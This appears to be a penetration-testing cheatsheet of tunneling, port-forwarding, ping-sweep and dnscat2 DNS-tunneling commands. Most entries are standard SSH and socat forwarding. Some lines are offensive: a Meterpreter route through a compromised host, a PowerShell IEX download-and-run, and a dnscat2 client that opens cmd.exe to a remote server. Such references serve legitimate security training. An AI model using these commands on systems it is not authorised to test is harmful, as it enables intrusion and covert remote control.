Pivoting, Tunneling & Port Forwarding
Pivoting, Tunneling & Port Forwarding Cheatsheet¶
Port Forwarding & Tunneling¶
| Options | Commands | Description |
|---|---|---|
| Local Port Forwarding with SSH | ssh -L 8080:localhost:80 user@remote | Forward local port 8080 to remote server’s port 80 via SSH |
| Remote Port Forwarding with SSH | ssh -R 8080:localhost:80 user@remote | Forward remote port 8080 to local machine’s port 80 via SSH |
| Dynamic Port Forwarding with SSH (SOCKS Proxy) | ssh -D 1080 user@remote | Create a SOCKS proxy on local port 1080 via SSH |
| Port Forwarding with Netcat (TCP) | nc -lvp 8080 -c "nc target 80" | Forward local port 8080 to target’s port 80 using Netcat |
| Simple HTTP Tunneling with socat | socat TCP-LISTEN:8080,fork TCP:target:80 | Tunnel local port 8080 to target’s port 80 using socat |
| SOCKS Proxy with sshuttle | sshuttle -r user@remote 0/0 -vv | Transparent proxy over SSH, forwarding all traffic through remote machine |
| Reverse SSH Tunnel | ssh -fN -R 9090:localhost:22 user@remote | Set up a reverse SSH tunnel to allow the remote server to access your local SSH service |
| Chisel Reverse HTTP Tunnel | ./chisel server -p 8080 --reverse (Server) ./chisel client http://<server-ip>:8080 R:9000:127.0.0.1:9000 (Client) | Set up a reverse HTTP tunnel using Chisel, forwarding remote port 9000 to local port 9000 |
| SSHuttle for VPN-like Access | sshuttle --dns -r user@remote 0/0 | Route all traffic through a remote server with DNS resolution, similar to a VPN |
| Pivot with Metasploit (Meterpreter) | run autoroute -s 10.0.0.0/24 | Add a route through a compromised machine |
Ping Sweep¶
| Options | Commands | Description |
|---|---|---|
| Ping Sweep with Command Prompt | for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i | find "Reply" | Perform a ping sweep using a loop in Command Prompt |
| Ping Sweep with PowerShell | 1..254 | ForEach-Object {Test-Connection -ComputerName 192.168.1.$_ -Count 1 -Quiet} | Perform a ping sweep using a loop in PowerShell |
| Ping Sweep with Bash | for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip | grep "64 bytes"; done | Perform a ping sweep using a loop in Bash |
| Ping Sweep with Bash | for ip in {1..254}; do (ping -c 1 172.16.5.$ip | grep "bytes from" &); done | Perform a ping sweep using a loop in Bash |
| Ping Sweep with Nmap | nmap -sn 192.168.1.0/24 | Use Nmap to perform a ping sweep across a subnet |
DNS Tunneling with dnscat2¶
| Options | Commands | Description |
|---|---|---|
| Start dnscat2 Server | ruby dnscat2.rb | Start the dnscat2 server to listen for incoming connections via DNS |
| Connect dnscat2 Client on Linux | ./dnscat --dns server=<server_ip> --domain <your_domain> | Start dnscat2 client on a Linux machine and connect to the specified dnscat2 server using your domain |
| Connect dnscat2 Client on Windows (using PowerShell) | IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/iagox86/dnscat2/master/client/dnscat2.ps1'); dnscat2 -dns server=<server_ip> -domain <your_domain> | Download and run dnscat2 client on a Windows machine using PowerShell, and connect to the specified dnscat2 server and domain |
| dnscat2 Client Options | ./dnscat --dns server=<server_ip> --domain <your_domain> --exec cmd.exe | Example of dnscat2 client running with options, executing cmd.exe on the target machine |